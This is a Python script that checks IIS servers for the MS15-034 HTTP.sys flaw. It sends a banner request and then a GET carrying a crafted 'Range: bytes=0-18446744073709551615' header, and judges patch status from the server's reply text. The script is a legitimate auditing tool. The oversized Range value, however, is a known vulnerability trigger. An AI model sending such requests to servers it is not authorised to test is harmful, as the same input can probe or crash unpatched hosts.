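r'''
___.                                   .___ __                         __
\_ |__   ____ ___.__. ____   ____    __| _//  |________ __ __  _______/  |_
 | __ \_/ __ <   |  |/  _ \ /    \  / __ |\   __\_  __ \  |  \/  ___/\   __\
 | \_\ \  ___/\___  (  <_> )   |  \/ /_/ | |  |  |  | \/  |  /\___ \  |  |
 |___  /\___  > ____|\____/|___|  /\____ | |__|  |__|  |____//____  > |__|
     \/     \/\/                \/      \/                        \/

MS15-034 Checker

Danger! This script has not been properly qa'd and will probably fail in
terrible ways. It is based off a change in HTTP!UlpParseRange in which an
error code is returned as a result of a call to HTTP!RtlULongLongAdd when
evaluating the upper and lower range of an HTTP range request.

-BF

8a8b2112 56              push    esi
8a8b2113 6a00            push    0
8a8b2115 2bc7            sub     eax,edi
8a8b2117 6a01            push    1
8a8b2119 1bca            sbb     ecx,edx
8a8b211b 51              push    ecx
8a8b211c 50              push    eax
8a8b211d e8bf69fbff      call    HTTP!RtlULongLongAdd (8a868ae1) ; here
'''
# The docstring is a raw string because the banner is full of backslashes
# (one of them ends a line), which a normal string literal would treat as
# escape sequences / line continuations.

import socket
import random  # not referenced by the checks below; kept from the original file

# Host to audit. Published empty; set it to the address of the server you are
# checking before running the script.
ipAddr = ""

# Despite the name, this is the *decimal* spelling of 0xFFFFFFFFFFFFFFFF
# (2**64 - 1), used as the upper bound of the Range header.
hexAllFfff = b"18446744073709551615"

# Byte literals keep the payloads identical on Python 2 and usable on Python 3,
# where sockets only accept bytes.
req1 = b"GET / HTTP/1.0\r\n\r\n"
req = b"GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + b"\r\n\r\n"

# Upper bound, in seconds, for connect/send/recv so an unresponsive host cannot
# hang the audit forever (the original had no timeout).
TIMEOUT_SECONDS = 10


def _exchange(payload):
    """Send *payload* to ``ipAddr`` on TCP/80 and return the first read.

    A fresh connection is opened for every request and is always closed,
    including when the peer times out or resets the connection.

    Args:
        payload: Raw HTTP request bytes.

    Returns:
        Up to 1024 bytes from a single ``recv`` call. A response that arrives
        in several segments may be truncated, which can push the caller into
        its "unexpected response" branch.

    Raises:
        socket.error / socket.timeout: propagated unchanged on network failure.
    """
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    conn.settimeout(TIMEOUT_SECONDS)
    try:
        conn.connect((ipAddr, 80))
        # sendall() retries short writes; send() may transmit only a prefix.
        conn.sendall(payload)
        return conn.recv(1024)
    finally:
        conn.close()


print("[*] Audit Started")

# Step 1: plain request, used only to look for a Microsoft server banner.
# NOTE(review): this is a banner check, not proof. A host whose Server header
# is stripped or rewritten (or that sits behind a reverse proxy) is reported
# as "Not IIS" and the range check is skipped, so that verdict should not be
# read as "not affected". Only plain HTTP on port 80 is examined.
boringResp = _exchange(req1)
if b"Microsoft" not in boringResp:
    print("[*] Not IIS")
    raise SystemExit(0)

# Step 2: the Range request with the maximum 64-bit upper bound. The verdict is
# taken from literal response text, so a localized or customised error page
# lands in the "cannot discern" branch rather than in "Looks Patched".
goodResp = _exchange(req)
if b"Requested Range Not Satisfiable" in goodResp:
    # The range was parsed and answered instead of being rejected.
    print("[!!] Looks VULN")
elif b" The request has an invalid header name" in goodResp:
    # The Range header itself was refused, which the docstring attributes to
    # the error now returned while evaluating the range bounds.
    print("[*] Looks Patched")
else:
    print("[*] Unexpected response, cannot discern patch status")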